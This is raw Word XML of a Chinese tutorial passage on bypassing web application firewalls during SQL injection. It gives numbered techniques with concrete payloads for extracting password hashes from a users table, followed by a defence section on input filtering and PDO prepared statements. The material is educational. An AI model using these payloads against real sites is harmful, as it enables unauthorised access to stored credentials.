    <w:p w14:paraId="1FA2F99C"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amp;id=/select/</w:t>
      </w:r>
      <w:r w:rsidR="004B5B16" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;id=/pwd/&amp;id=/from/&amp;id=*/users—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4E96E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具体分析的话就涉及到查询语句的后台代码的编写了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440130AE"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服务器是这样写的：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB56597"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elect * from table where a=”.$_GET[‘a’].” and b=”.$</w:t>
      </w:r>
      <w:r w:rsidR="004B5B16" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_GET[‘b’].” limit “.$_GET[‘c’];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56073EA6"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那我们可以构造这样的注入语句：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFB5C9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a=1+union/&amp;b=/select+1,pass/&amp;c=/from+users—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1CEBF8"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最终解析为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C956987"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elect from table where a=1 union/ and b=/se</w:t>
      </w:r>
      <w:r w:rsidR="004B5B16" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>lect 1,pass/limit */from users—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFE311D"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可以看到，这种方式其实比较适合白盒测试，而对于黑盒渗透的话，用起来比较麻烦。但是也可以一试。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AF13E8" w14:textId="77777777" w:rsidR="009E61BB" w:rsidRPr="006472F7" w:rsidRDefault="009E61BB" w:rsidP="00200887">
      <w:pPr>
        <w:ind w:firstLineChars="94" w:firstLine="198"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006472F7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>6. 使用逻辑运算符 or /and绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9B741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OR+0x50=0x50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C2454B"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and+ascii(lower(mid((select+pwd+</w:t>
      </w:r>
      <w:r w:rsidR="004B5B16" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>from+users+limit+1,1),1,1)))=74</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E91008"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顺便解释一下第二句话，从最里面的括号开始分析，select+pwd+from+users+limit+1,1 这句是从users表里查询pwd字段的第一条记录，比如是admin，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2018EF2E"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然后mid(上一句),1,1就是取admin的第一个字符，也就是a，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779C7D51"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lower(上一句)就是把字符转换为小写，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498082D0"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然后ascii就是把a转换成ascii码，看等不等于74.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62273F1A" w14:textId="77777777" w:rsidR="009E61BB" w:rsidRPr="006472F7" w:rsidRDefault="009E61BB" w:rsidP="00200887">
      <w:pPr>
        <w:ind w:firstLineChars="144" w:firstLine="304"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006472F7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>7. 比较操作符替换</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16ACA49C"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包括!= 不等于，&lt;&gt;不等于，&lt;小于，&gt;大于，这些都可以用来替换=来绕过，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7833B82E"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上一个例子，要判断是不是74，假设=被过滤，那么我们可以判断是不是大于73，是不是小于75，然后就知道是74了。。很多WAF都会忘了这个。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732DAFCC" w14:textId="77777777" w:rsidR="009E61BB" w:rsidRPr="006472F7" w:rsidRDefault="009E61BB" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="422"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006472F7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>8. 同功能函数替换</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABE2550"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Substring()可以用mid(),substr()这些函数来替换，都是用来取字符串的某一位字符的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAA3FD0"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Ascii()编码可以用hex(),bin(),也就是16进制和二进制编码替换</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5EC88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Benchmark() 可以用sleep()来替换，这两个使用在基于延时的盲注中，有机会给大家介绍</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7840E00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如果连这些都屏蔽了，还有一种新的方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE04536"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ubstring((select ‘password’),1,1) = 0x70</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CC1770"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ubstr((select ‘password’),1,1) = 0x70</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51ABF00A" w14:textId="77777777" w:rsidR="009E61BB"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kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>mid(</w:t>
      </w:r>
      <w:r w:rsidR="006472F7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(select ‘password’),1,1) = 0x70</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C248CFE"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这三条，都是从password里判断第一个字符的值，可以用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3141D28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trcmp(left(‘password’,1), 0x69) = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453742BD"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trcmp(left(‘password’,1), 0x70) = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74082C7E"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strcmp(left(‘password’,1), 0x71</w:t>
      </w:r>
      <w:r w:rsidR="004B5B16" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>) = -1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789FC3D3"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来替换，left用来取字符串左起1位的值，strcmp用来比较两个值，如果比较结果相等就为0，左边小的话就为-1，否则为1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24285EC7"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还有我前几篇说过的group_concat和concat和concat_ws也可以互相替换</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC8CC23" w14:textId="77777777" w:rsidR="009E61BB" w:rsidRPr="006472F7" w:rsidRDefault="009E61BB" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="422"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006472F7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>9. 盲注无需or和and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214C3E5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有这样一个注入点：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05018C52" w14:textId="77777777" w:rsidR="009E61BB" w:rsidRPr="00CD76A0" w:rsidRDefault="004B5B16"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ndex.php?uid=123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2770D60B"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and or 被过滤了，其实有一种更直接的方法，我们直接修改123为我们的语句生成的，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED03CF0"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ndex.php?uid=strcmp(left((select+hash+from+users+limit+0,1),1),0x42)+123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BE8DF8" w14:textId="77777777" w:rsidR="009E61BB" w:rsidRPr="00CD76A0" w:rsidRDefault="009E61BB" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A592135"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123的时候页面是正确的，我们现在在盲猜hash的第一位，如果第一位等于0x42也就是B，那么strcmp结果为0，0+123=123，所以页面应该是正确的。否则就说明不是B，就这样猜，不用and 和or</w:t>
      </w:r>
      <w:r w:rsidR="004B5B16" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485BDE59" w14:textId="77777777" w:rsidR="009E61BB" w:rsidRPr="006472F7" w:rsidRDefault="009E61BB" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="422"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006472F7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>10. 加括号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076DCBFC"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w:t>
      </w:r>
      <w:r w:rsidR="004B5B16" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1+union+(select+1,2+from+users)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A37393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比如，上面这一条被WAF拦截了。可以试试加一些括号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539BF04A"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select+1,2+from+xxx)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205E2EE3"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select(1),mid(hash,1,32)from(users))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5839726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select’1’,concat(login,hash)from+users)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE80077"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union(((((((select(1),hex(hash)from(users))))))))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15669D8A" w14:textId="77777777" w:rsidR="009E61BB" w:rsidRPr="00CD76A0" w:rsidRDefault="004B5B16"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or(0x50=0x50)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB6757A" w14:textId="77777777" w:rsidR="004B5B16"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最后，个人能力毕竟有限，有些也一时想不起，想起来的话再补充。同时欢迎大家指正，补充。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC58198" w14:textId="77777777" w:rsidR="009E61BB" w:rsidRPr="006472F7" w:rsidRDefault="009E61BB" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="422"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006472F7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>11.缓冲区溢出绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A096782"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刚刚写着把这个给忘了。这个是从国外一个博客看到的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D49E0C"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id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C0188F" w14:textId="77777777" w:rsidR="009E61BB" w:rsidRPr="00CD76A0" w:rsidRDefault="009E61BB" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="004B5B16" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>27,28,29,30,31,32,33,34,35,36–+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7B1CDB" w14:textId="77777777" w:rsidR="003F64BA" w:rsidRPr="00CD76A0" w:rsidRDefault="009E61BB" w:rsidP="006472F7">
      <w:pPr>
        <w:ind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其中0xAAAAAAAAAAAAAAAAAAAAA这里A越多越好。。一般要求1000个以上</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0F07F4" w14:textId="77777777" w:rsidR="003F64BA" w:rsidRDefault="006472F7" w:rsidP="006472F7">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidR="002D4575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00951D74">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00951D74">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003F64BA" w:rsidRPr="003F64BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r w:rsidR="003F64BA" w:rsidRPr="003F64BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入防御方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB0E1FF" w14:textId="77777777" w:rsidR="006472F7" w:rsidRDefault="003F64BA" w:rsidP="006472F7">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>解决SQL注入问题的关键是对所有可能来自用户输入的数据进行严格的检查、对数据库配置使用最小权限原则。通常修复使用的方案有：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DAE2FC" w14:textId="77777777" w:rsidR="00635462" w:rsidRPr="00635462" w:rsidRDefault="00061633" w:rsidP="00635462">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>一、</w:t>
      </w:r>
      <w:r w:rsidR="00635462" w:rsidRPr="00635462">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>代码层面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09428DE1" w14:textId="77777777"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lastRenderedPageBreak/>
        <w:t>1.对输入进行严格的转义和过滤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5949AA48" w14:textId="02794BCD"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t>2.使用参数化（Parameterized）</w:t>
      </w:r>
      <w:r w:rsidR="00B54182">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00B54182" w:rsidRPr="00B54182">
        <w:t>从</w:t>
      </w:r>
      <w:r w:rsidR="00B54182" w:rsidRPr="00B54182">
        <w:t>PHP 5.1</w:t>
      </w:r>
      <w:r w:rsidR="00B54182" w:rsidRPr="00B54182">
        <w:t>开始</w:t>
      </w:r>
      <w:r w:rsidR="00B54182">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00B54182">
        <w:t>php</w:t>
      </w:r>
      <w:r w:rsidR="00B54182">
        <w:t>可以通过</w:t>
      </w:r>
      <w:r w:rsidR="00B54182">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00B54182">
        <w:t>DO</w:t>
      </w:r>
      <w:r w:rsidR="00B54182">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00B54182">
        <w:t>prepare</w:t>
      </w:r>
      <w:r w:rsidR="00B54182">
        <w:t>预处理函数执行</w:t>
      </w:r>
      <w:r w:rsidR="00B54182">
        <w:t>sql</w:t>
      </w:r>
      <w:r w:rsidR="00B54182">
        <w:t>语句，不使用</w:t>
      </w:r>
      <w:r w:rsidR="00B54182">
        <w:t>mysqli_query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A16792C" w14:textId="77777777" w:rsidR="00635462" w:rsidRPr="00635462" w:rsidRDefault="00635462" w:rsidP="00635462">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B339833" w14:textId="77777777" w:rsidR="00635462" w:rsidRPr="00635462" w:rsidRDefault="00061633" w:rsidP="00635462">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>二、</w:t>
      </w:r>
      <w:r w:rsidR="00635462" w:rsidRPr="00635462">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>网络层面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1562C940" w14:textId="77777777"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t>1.通过WAF设备启用防SQL Inject注入策略（或类似防护系统）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CF653C" w14:textId="77777777"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t>2.云端防护（360网站卫士，阿里云盾等）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746B5F1F" w14:textId="77777777"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t>PHP防范推荐方法：PDO预处理——PDO预处理能防止SQL注入的原因</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562D2E88" w14:textId="77777777" w:rsidR="00635462" w:rsidRPr="00635462" w:rsidRDefault="00635462" w:rsidP="00635462">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00635462">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>没有进行PDO预处理的SQL，在输入SQL语句进行执行的时候，web服务器自己拼凑SQL的时候有可能会把危险的SQL语句拼凑进去。但如果进行了PDO预处理的SQL，会让MYSQL自己进行拼凑，就算夹带了危险的SQL语句，也不会进行处理只会当成参数传进去，而不是以拼接进SQL语句传进去，从而防止了SQL注入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5F046E" w14:textId="77777777" w:rsidR="001C2A5F" w:rsidRDefault="00D269A4" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId192" w:history="1">
        <w:r w:rsidR="001C2A5F">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://www.php.cn/course/868.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="23BBC81D" w14:textId="02AAFF71" w:rsidR="00D75593" w:rsidRPr="00CD76A0" w:rsidRDefault="00D75593" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D75593">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://blog.csdn.net/dengjiexian123/article/details/53863038</w:t>
      </w:r>
      <w:bookmarkStart w:id="2" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:sectPr w:rsidR="00D75593" w:rsidRPr="00CD76A0" w:rsidSect="00884779">
      <w:headerReference w:type="even" r:id="rId193"/>
      <w:headerReference w:type="default" r:id="rId194"/>
      <w:footerReference w:type="even" r:id="rId195"/>
      <w:footerReference w:type="default" r:id="rId196"/>
      <w:headerReference w:type="first" r:id="rId197"/>
      <w:footerReference w:type="first" r:id="rId19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CF63" w14:textId="77777777" w:rsidR="00D269A4" w:rsidRDefault="00D269A4" w:rsidP="00321FCC">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="13CD3560" w14:textId="77777777" w:rsidR="00D269A4" w:rsidRDefault="00D269A4" w:rsidP="00321F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58CE" w14:textId="77777777" w:rsidR="003756DA" w:rsidRDefault="003756DA" w:rsidP="00074D5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9EE2" w14:textId="77777777" w:rsidR="003756DA" w:rsidRDefault="003756DA" w:rsidP="00074D5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DA0E" w14:textId="77777777" w:rsidR="003756DA" w:rsidRDefault="003756DA" w:rsidP="00074D5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FB68" w14:textId="77777777" w:rsidR="00D269A4" w:rsidRDefault="00D269A4" w:rsidP="00321FCC">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="18237A41" w14:textId="77777777" w:rsidR="00D269A4" w:rsidRDefault="00D269A4" w:rsidP="00321FC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C0B3" w14:textId="77777777" w:rsidR="003756DA" w:rsidRDefault="003756DA" w:rsidP="00074D5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C759" w14:textId="77777777" w:rsidR="003756DA" w:rsidRDefault="003756DA" w:rsidP="00074D5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C226" w14:textId="77777777" w:rsidR="003756DA" w:rsidRDefault="003756DA" w:rsidP="00074D5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9FE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D14E3568"/>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E24549"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A284149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9365CA5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="88E2A584"/>
    <w:lvl w:ilvl="0" w:tplc="7F58D0F0">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5042D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C2E66A0E"/>
    <w:lvl w:ilvl="0" w:tplc="DE88B476">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C65B7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1B920ECC"/>
    <w:lvl w:ilvl="0" w:tplc="0DD4027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9B73F8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="67DE2ABE"/>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B536644"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="07D285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76C"/>
    <w:rsid w:val="000011E3"/>
    <w:rsid w:val="00002A6F"/>
    <w:rsid w:val="00003506"/>
    <w:rsid w:val="00003BD2"/>
    <w:rsid w:val="00004116"/>
    <w:rsid w:val="0000486B"/>
    <w:rsid w:val="00006507"/>
    <w:rsid w:val="00011D8A"/>
    <w:rsid w:val="0001294A"/>
    <w:rsid w:val="00015305"/>
    <w:rsid w:val="0001544F"/>
    <w:rsid w:val="00015E49"/>
    <w:rsid w:val="00016317"/>
    <w:rsid w:val="000201D5"/>
    <w:rsid w:val="00020452"/>
    <w:rsid w:val="00020EFC"/>
    <w:rsid w:val="000236C4"/>
    <w:rsid w:val="00030023"/>
    <w:rsid w:val="00032B80"/>
    <w:rsid w:val="00034441"/>
    <w:rsid w:val="00034DF3"/>
    <w:rsid w:val="00035965"/>
    <w:rsid w:val="000449C6"/>
    <w:rsid w:val="0005231A"/>
    <w:rsid w:val="00053B13"/>
    <w:rsid w:val="000550CB"/>
